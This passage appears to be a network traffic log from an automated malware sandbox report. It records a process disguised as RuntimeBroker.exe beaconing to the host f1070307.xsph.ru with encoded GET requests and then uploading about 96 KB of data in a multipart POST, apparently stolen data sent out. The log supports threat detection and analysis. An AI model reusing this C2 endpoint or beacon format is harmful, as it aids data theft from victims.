Y5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:26.764673948 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:31.815203905 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:32.524915934 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye
Jan 3, 2025 00:27:32.742587090 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:37.728564024 CET	3887	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:38.557740927 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:43.568598986 CET	3887	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:44.256413937 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:48.652204990 CET	815	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&7603066d178d57644cba1e85f0eb372c=QX9JSUNJiOiIzYhVDN3YDZxM2NwEGNlNjYzETZ1QmZiZWY4UGN4EWYiwiI1IDOzgTYyEWM1gTOkNWMiFWMiBjZ3YDZhV2YxM2NjlzNzcjNkNzNjJiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W HTTP/1.1 Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:27:49.345875978 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jan 3, 2025 00:27:49.359678984 CET	607	OUT	POST /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N HTTP/1.1 Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryi5BcUS04v1zh5p3R User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Host: f1070307.xsph.ru Content-Length: 96625 Expect: 100-continue
Jan 3, 2025 00:27:49.570375919 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 00:27:49.575192928 CET	13596	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 69 35 42 63 55 53 30 34 76 31 7a 68 35 70 33 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 Data Ascii: ------------WebKitFormBoundaryi5BcUS04v1zh5p3RContent-Disposition: form-data; name="46a4933fabfb367b069fbdad41fe04e2"4QmM0gzM1EWMkNzM2M2N4Q2NmRWY5EmM4E2N3YmN4ATMyQTZwYGOl1iYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZ----------
Jan 3, 2025 00:27:49.580108881 CET	4944	OUT	Data Raw: c4 65 bc e2 11 8f 17 b6 41 ad f3 32 41 ad ff 24 f4 3f 1d c1 2e 8c 3e ed 7f af 7e 9a fa 8c 53 b8 d0 ec ca 6a bb 9e 24 13 dd 13 1f 99 11 df 70 e3 3b f2 89 8f 5c e4 7e 9d 8a ca 33 1d 72 3c 6e 5e e9 03 ef 76 3b b3 c2 bc da f5 a6 ae ef e1 d1 15 65 e7 Data Ascii: eA2A$?.>~Sj$p;\~3r<n^v;e<QIc>sZ<5!MHxJsam\|-r9?ox\E,g9nb) ) kHs1l^E:Brs(TP "HMP99l@hPyVip1/
Jan 3, 2025 00:27:49.580198050 CET	7416	OUT	Data Raw: b6 32 8d 8d fa 25 27 15 20 8a c1 c5 36 6f 54 b1 7f 63 69 60 e3 6e 88 65 e3 87 0c 33 c6 0f a9 2c f7 bf 5a b6 5d 11 bb 72 45 f4 71 5f 52 4e 5a 01 a8 1a 0f 78 6f 3e a6 66 e9 20 b9 14 9d 7d 6f f2 f5 8d 06 40 eb 4b 9f 02 39 93 4b 61 80 5f f9 39 bd e5 Data Ascii: 2%' 6oTci`ne3,Z]rEq_RNZxo>f }o@K9Ka_9HlC-x2tt:>f{wk+`-*?]1\|5WK+U>v=%&13Zb~w:u@;?Q)wV=\|R?;y>2a2TGzK5Vo
Jan 3, 2025 00:27:49.580387115 CET	4944	OUT	Data Raw: d5 57 83 4e 58 e4 fa 59 be c9 5d d1 89 91 b1 1b a1 fd e5 93 30 75 ee 41 c0 ad 6f 29 64 3a 1c f0 00 a9 bb 78 c0 0f 32 cf e7 23 d5 19 8b 91 b3 de 19 6b 6c c6 b8 58 3c a0 4d c3 52 83 c6 c3 4b 94 22 a5 3b a9 40 82 ac 26 8c 7a c9 d4 76 8e 4a bd 5f 7f Data Ascii: WNXY]0uAo)d:x2#klX<MRK";@&zvJ_;8~J\|sUx@:rRz^wrcRBg{>l95b~)o0R7_A:`?#'D?8[6Xc@4Mw(ioP;u~z'[JH=W7Mo?
Jan 3, 2025 00:27:49.580431938 CET	4944	OUT	Data Raw: e3 6c 0b ba f9 c1 ad a7 4f fc 90 6f f1 00 09 5c 4a 91 59 58 44 41 79 fd 16 ef b9 d5 9a 70 c7 57 07 0d 0b 76 1c 19 32 1a f6 56 24 3b bd 12 79 4c 8b 07 34 57 ab 3d e6 0a d0 ae 09 82 7c 98 4b 1e 54 70 f6 bb 76 a9 4e 9a ca 33 fd 33 1e c0 11 ba 79 42 Data Ascii: lOo\JYXDAypWv2V$;yL4W=\|KTpvN33yB"},W+ZlZWqz.qq8}~M0&7_<&N{jvo>O]& C< Nl\K4<@p;_=;~e3wMDgfUNaeX
Jan 3, 2025 00:27:49.580641031 CET	2472	OUT	Data Raw: 51 57 20 d7 83 ef 2f 37 e9 96 97 6b 55 b3 2f bf 10 78 28 4d 25 69 d6 a9 00 09 ec df 2b 3c e4 d0 ae bd 8f 92 9b 0b 7e d2 3a fc f2 d3 cd 97 f0 a9 4a 56 03 bf 30 cd c7 8c 7a 39 ce ea 4a 16 b3 5a 55 28 7b b3 af 35 d0 ce de 76 d7 12 c6 0d b3 97 62 0e Data Ascii: QW /7kU/x(M%i+<~:JV0z9JZU({5vb,7Kl"{W7c`B6GB"6:JI*g}Cb76%Z:]scm7tj<RgbcKFFIy%1?~}]jPox{(^oZX@
Jan 3, 2025 00:27:49.584979057 CET	7416	OUT	Data Raw: e1 d0 bc 3c 1a e5 c8 c3 24 90 8f 8b b3 7a ff c3 88 ab ea f9 4b 5b a1 f5 02 10 e9 3c e9 a4 b2 10 cd d1 65 07 f5 85 90 bd bb ea de 4f be f3 6a ad a0 88 8e 93 ad 4d 98 95 af a9 f9 7c 52 0b e1 fc 65 fd 8a e7 8e 06 18 39 09 79 97 6d 67 86 7e 7a 0a e5 Data Ascii: <$zK[<eOjM\|Re9ymg~zRr^ :-g2HrR[."OGR_&G9Z_w?(rYNv[3nAJ[}**Y"{}hn:9[{1''DUkzS(.C2{.<h+)N
Jan 3, 2025 00:27:49.585053921 CET	7416	OUT	Data Raw: 59 58 7c 76 b2 0a 38 07 01 3d 1e 7c 95 c9 0c 0e 0c e9 cf 4e 18 c9 8a ba 18 86 10 3a 54 bf 2d bb a2 ae 9a f4 47 5c d5 1b 0a a1 97 be 70 db af 1e cc a8 a7 31 04 0e 1c c9 34 b5 44 3c 44 88 a9 85 7a 48 89 2d 73 29 51 ff f2 ca 7d 4f 70 cf 9d 9a 31 fc Data Ascii: YX\|v8=\|N:T-G\p14D<DzH-s)Q}Op1<6BcS8.!T'4JKZ0H[^ib"{2VoYE/e"SZ)L<Ms3v{(K=gW*Z$'?L%LpK4c\8&Jf
Jan 3, 2025 00:27:49.585110903 CET	4944	OUT	Data Raw: b0 21 7f 65 c4 e3 b6 81 96 a4 84 5a 29 5d d4 77 26 1e 63 78 97 36 76 aa 13 6d 32 3a 6d c1 05 14 2e f2 2f 3f 19 a8 2c 89 ea 3f 64 5c 0c 3d dc 6d 0e 6b f6 13 2e 57 c9 43 c2 15 23 ce f2 68 e4 4d a0 9a de 91 38 46 54 28 0b 06 bd 56 61 6e 32 6e dc db Data Ascii: !eZ)]w&cx6vm2:m./?,?d\=mk.WC#hM8FT(Van2nB:]$oQ5(2;N4^DKRH9d1@P!ZWHlGWg1x!hmY;Bi"E-Wp=*EO?^wxj{M%##
Jan 3, 2025 00:27:49.585179090 CET	4944	OUT	Data Raw: ac 57 14 bf 86 4f 0e 37 ae 83 4d 10 80 ef 1d 38 d7 2a 1c 9c 42 9a fa 70 4e 06 23 ef b9 55 19 3e 29 16 f6 b2 d2 a8 4a b3 a1 1e 3d 51 f6 58 41 c1 fb d5 6a 93 80 9e 15 8c 5d 57 3a 23 e4 ad ee a6 92 a1 0e e8 cc cd f5 f7 59 21 f3 47 07 94 f0 8f cf d6 Data Ascii: WO7M8*BpN#U>)J=QXAj]W:#Y!GZ+<g[TY\|X>p[J t" OacyVO[:>J>{OmVjPxeXnYUIA]B+Lz1\9~.:
Jan 3, 2025 00:27:50.070810080 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:49.274272919 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:27:54.384160995 CET	3911	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=d1nIiojIyMWY1QzN2QWMjdDMhRTZzI2MxUWNkZmYmFGOlRDOhFmIsIiNmFmY2gDOihDZ5QmZ2kDZzUGZ4ETYyE2YmVjY2gjNjRjMjZmNmlDOiojI0cDOwEGOygjM3EmZ2YmZmhDZhlDOwUmY5MGOwEWN4AjIsIiYkFTN1ETYkZTN0YDNmNzNwcDO5QmYkFmYwEDO5AzMxITO2QzMmBDZiojIjdjNhFzMkFjYxQGOkJ2YwQTMmVzNwUjM5MDNzQGNyYjI7xSfiElZ5oUaUl2bqlEMVpmTqpkMNpmUH5EbWRlTyk0RPlmSq1EbkRVW1sGVadXS65UaadVTzsGVZRTQql1MrpmT4l0QMlGNrlkNJN0T5FlMZFTU6llerRVWqJEVZdXU6lVNBRkWtZ1VNhXRH1EenRVW3llMOBTVt5EaGdVW0Ukaal2dpl [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru Connection: Keep-Alive
Jan 3, 2025 00:27:55.060776949 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:27:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49775	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
